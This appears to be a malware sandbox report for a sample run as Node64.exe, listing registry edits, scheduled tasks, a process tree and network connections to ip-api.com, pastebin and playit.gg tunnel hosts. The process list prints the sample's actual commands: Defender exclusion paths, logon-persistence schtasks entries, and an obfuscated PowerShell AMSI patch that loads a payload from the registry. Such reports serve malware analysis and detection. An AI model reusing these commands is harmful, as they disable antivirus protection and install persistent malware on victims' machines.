| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek | C:\Windows\System32\mousocoreworker.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "001840102DE3EC6A" | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "001840102DE3EC6A" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | C:\Windows\System32\mousocoreworker.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000f568195fd89c2d45ba66f134061263750000000002000000000010660000000100002000000022d465a17fc2e82f2fd8ae421ebad4037396ebdfcfd8dd9acef6db86bffe820c000000000e800000000200002000000058bb1295083f924879b43722f305d729a2db8740fed5f8b82dbc5bd4cbf3f612b0030000436836fc0b8f1fe3a53c9c92287cc8ef0b410e69049375af493efd17a413771f0af75056bf8a33ab32d5809b4cb3005a49ea779f2150bf599d8e745ebf3a2d60bbf1158cd9b6c6982468ce7349d208f73cb60a7d5cdd1520197209aed1bda07963afce3cb43b47fafd50a4076e27886c1e2913067e85ae2514028dec95f0c7e4aa895f0de028a834c4e605f1ecfb73711050ec2ce83fcd0a7715d594ec7970d88a10b147f82648785cec8a1cdb9852bd319d5dbf8504dccd165c1be0a852c38a65fa749695e6f7ee10e534ddf256f6173e4b9cc41f089cbbe9d1496c5f03244938474f635ee13fd9151a6caef0728e6931ef5a9836254c78edf5f54b1c8b9faa5e8a452050437eaa5433ce113de64be95c62d40a983768e3c5fe9e6726f047cffdc15e24afdd632ffe85807f0844cebb6e8a619ef1329d30b7fe3586a2f8b8b3bec2a0057302b49fdb9bea3f5bf9b51da29f1e084a83be85b9fe252b035832884f81d82524b3d3c3834b4a38c4f5b783d589f132bf7f9ab284045275903c97e991950ebf3835478f2cc643255efa6ed5a7f440da1fc6cffb3d2af467f2c6d97a1d847ace77a7bb54b4c062fc99ec113dd84929cd30d33627cd6dd7379cd8834fbfe1c33cc53386278bc48a74aec354fa54f424e680799ff98a031c9bd3bd9149c7c57aa28d9f21e533f7c660f9655d331ea93f345219e098fa01e31202b66b177489baba10d9c08325224842e2785ed09cd787f20be60b6b1e63af405ae8603300ff9039fea02f918d6069476206d810eaf4ff4c34e3c8eaea14f8bdec0aee4f8c1d566dbfee23183084bce8dcc207ed85c4bf1a864de8d1aa2442538098ba0549cbbdc91ac95f7ba1b8ccaf62f73e3c4a6965cd8e747ea1d37578bc45401d10ad0086911ab7436f6f16099f52afb3049cb5494ce4422280cb00084c5b2ed66e6050cdd6825a921f5993345eda6565878525a946da4f2921565f689d3ea1ab9911a686a162b4f953806fa7ee96dd35cc83ce86334110c956c0d4d4d03b1fdc85ffcb82f2504cf3cd7a44e290f7f9544425033f5a368735b08dcea3fd917d7c0ff14c5f5c8de436f0f15582a30e8d768d189d861bd30e18d580b1a7b2563801cc112072264f48ffb2ef03b30388b0cd17abc885e9dad26e29ace8ac379b67c724fab6e664c4097fd8e2c36235ba73ce56d2f23a98eb43deb65b9b30369f4722627a9478b37fe4ce982bae804d17fdd397149368b040195d9463e1e150962ddcc19a23095888a3aaa119c459d73edac9b4a2152317eabf96982d74aef0f601a02a97763e04d8d93364573e24f66a0bc33240000000f80e10c1d8ba925cb1d640d90623e36c858ac8a1eb5a9c14e6e3ccf39f5010b98dca39267b903408ffa164e95645de8fa4f637e8777d1df029f1aa34c1a0bbe6 | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414} | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek\CacheStore | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe
"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe"
C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe 3874f99676d2a171db1648b456c00305 AF6bVzg0Nk+Uob03FtQ14g.0.1.0.0.0
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node32.exe'
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node32" /SC ONLOGON /TR "C:\Windows\System32\$Node32.exe" /RL HIGHEST
C:\Windows\System32\$Node32.exe
"C:\Windows\System32\$Node32.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node2Json.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:NmGdSppURqqL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$MQoQQivOdnqpQn,[Parameter(Position=1)][Type]$brBwrasQPu)$tNVMvHtSxhf=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+''+'l'+'e'+[Char](99)+''+'t'+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+'le'+'g'+''+'a'+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+'e'+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+'y'+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+'e'+''+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+'e'+[Char](84)+''+[Char](121)+'p'+'e'+'',''+[Char](67)+'l'+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c,S'+[Char](101)+''+[Char](97)+''+[Char](108)+'ed'+','+''+[Char](65)+'n'+'s'+''+'i'+'C'+'l'+''+[Char](97)+''+'s'+''+'s'+','+[Char](65)+'u'+[Char](116)+''+[Char](111)+''+[Char](67)+''+'l'+''+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$tNVMvHtSxhf.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+'p'+''+'e'+''+[Char](99)+''+'i'+''+'a'+''+'l'+'N'+[Char](97)+''+[Char](109)+'e'+[Char](44)+'Hid'+'e'+'By'+'S'+''+[Char](105)+''+[Char](103)+''+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+'i'+'c',[Reflection.CallingConventions]::Standard,$MQoQQivOdnqpQn).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+'ime,'+'M'+''+'a'+''+[Char](110)+'a'+[Char](103)+''+[Char](101)+'d');$tNVMvHtSxhf.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+'P'+'u'+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+''+'H'+'i'+[Char](100)+'e'+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+'e'+[Char](119)+''+'S'+''+'l'+''+'o'+''+[Char](116)+''+','+'V'+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+[Char](97)+''+[Char](108)+'',$brBwrasQPu,$MQoQQivOdnqpQn).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+'e'+',M'+'a'+'na'+'g'+'e'+[Char](100)+'');Write-Output $tNVMvHtSxhf.CreateType();}$SOWVGuXakUZFC=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+'s'+'t'+'e'+'m.'+[Char](100)+''+[Char](108)+'l')}).GetType('M'+'i'+''+'c'+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+''+'t'+''+'.'+'W'+'i'+''+'n'+''+[Char](51)+''+'2'+''+'.'+''+'U'+''+'n'+'s'+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+[Char](105)+'ve'+[Char](77)+'e'+[Char](116)+'h'+'o'+''+[Char](100)+'s');$vXuVyjDcpUaZxj=$SOWVGuXakUZFC.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](80)+'r'+[Char](111)+'c'+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+'u'+'b'+[Char](108)+'i'+'c'+''+[Char](44)+'S'+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$HGXpWVZeCoipORtRsmd=NmGdSppURqqL @([String])([IntPtr]);$ZDOxEshTmBMFRKRmZMmVew=NmGdSppURqqL @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$jGQpogqSIBl=$SOWVGuXakUZFC.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+'M'+'o'+'d'+'ul'+'e'+'Han'+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+'e'+'r'+''+[Char](110)+'el'+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')));$zrftaLTEZxtDJV=$vXuVyjDcpUaZxj.Invoke($Null,@([Object]$jGQpogqSIBl,[Object](''+[Char](76)+''+'o'+'a'+'d'+''+[Char](76)+'ib'+'r'+'a'+[Char](114)+''+'y'+''+[Char](65)+'')));$JHlGsvfaGyzWHbMmv=$vXuVyjDcpUaZxj.Invoke($Null,@([Object]$jGQpogqSIBl,[Object]('Vir'+[Char](116)+'ua'+'l'+''+[Char](80)+'r'+[Char](111)+''+'t'+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$WUegRNP=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zrftaLTEZxtDJV,$HGXpWVZeCoipORtRsmd).Invoke(''+[Char](97)+''+'m'+''+'s'+'i'+'.'+''+[Char](100)+''+'l'+''+[Char](108)+'');$kykrGHgouzOPlRUcE=$vXuVyjDcpUaZxj.Invoke($Null,@([Object]$WUegRNP,[Object](''+'A'+''+[Char](109)+''+'s'+''+[Char](105)+'S'+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+''+'u'+''+[Char](102)+''+'f'+''+[Char](101)+'r')));$PYOkbsexQE=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JHlGsvfaGyzWHbMmv,$ZDOxEshTmBMFRKRmZMmVew).Invoke($kykrGHgouzOPlRUcE,[uint32]8,4,[ref]$PYOkbsexQE);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$kykrGHgouzOPlRUcE,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JHlGsvfaGyzWHbMmv,$ZDOxEshTmBMFRKRmZMmVew).Invoke($kykrGHgouzOPlRUcE,[uint32]8,0x20,[ref]$PYOkbsexQE);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+'F'+[Char](84)+'W'+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue('$'+[Char](78)+'od'+[Char](101)+'s'+[Char](116)+'a'+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node2Json" /SC ONLOGON /TR "C:\Windows\System32\$Node2Json.exe" /RL HIGHEST
C:\Windows\System32\$Node2Json.exe
"C:\Windows\System32\$Node2Json.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node3Json.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node3Json" /SC ONLOGON /TR "C:\Windows\System32\$Node3Json.exe" /RL HIGHEST
C:\Windows\System32\$Node3Json.exe
"C:\Windows\System32\$Node3Json.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{f2983257-2dd5-4945-ba26-cc09f94ee010}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 235.3.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | visit-kill.gl.at.ply.gg | udp |
| US | 147.185.221.23:51861 | visit-kill.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | every-bend.gl.at.ply.gg | udp |
| US | 147.185.221.21:48150 | every-bend.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 147.185.221.21:48150 | every-bend.gl.at.ply.gg | tcp |
| US | 147.185.221.23:51861 | visit-kill.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 216.203.100.95.in-addr.arpa | udp |
| US | 147.185.221.21:48150 | every-bend.gl.at.ply.gg | tcp |
| US | 147.185.221.23:51861 | visit-kill.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 201.203.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 147.185.221.21:48150 | every-bend.gl.at.ply.gg | tcp |
| US | 147.185.221.23:51861 | visit-kill.gl.at.ply.gg | tcp |
| US | 147.185.221.21:48150 | every-bend.gl.at.ply.gg | tcp |
| US | 147.185.221.23:51861 | visit-kill.gl.at.ply.gg | tcp |
| US | 147.185.221.21:48150 | every-bend.gl.at.ply.gg | tcp |
Files
memory/2568-0-0x00007FF891683000-0x00007FF891685000-memory.dmp
memory/2568-1-0x0000000000D90000-0x0000000000DF2000-memory.dmp
memory/2568-2-0x00007FF891680000-0x00007FF892142000-memory.dmp
